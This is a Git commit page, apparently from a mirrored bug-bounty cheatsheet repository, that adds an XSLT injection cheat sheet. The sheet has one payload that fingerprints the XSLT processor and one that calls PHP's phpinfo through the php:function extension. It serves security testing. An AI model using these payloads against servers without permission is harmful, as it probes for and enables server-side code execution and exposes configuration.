Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-22 02:53:06 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #12 from kuromatae/master

Browse source 
XSLT Injection Cheat Sheet
This commit is contained in:
EdOverflow 2017-09-28 15:15:49 +02:00 committed by GitHub
commit 6a8394db98
2 changed files with 26 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
README.md
View file

@ -15,6 +15,7 @@
- [Crypto](cheatsheets/crypto.md)
- [Template Injection](cheatsheets/template-injection.md)
- [Content Injection](cheatsheets/content-injection.md)
- [XSLT Injection](cheatsheets/xslt.md)
# Contributing

25
cheatsheets/xslt.md Normal file
View file

@ -0,0 +1,25 @@
## XSLT Injection
**Backend infos**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>
```
**Injecting in PHP**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>
```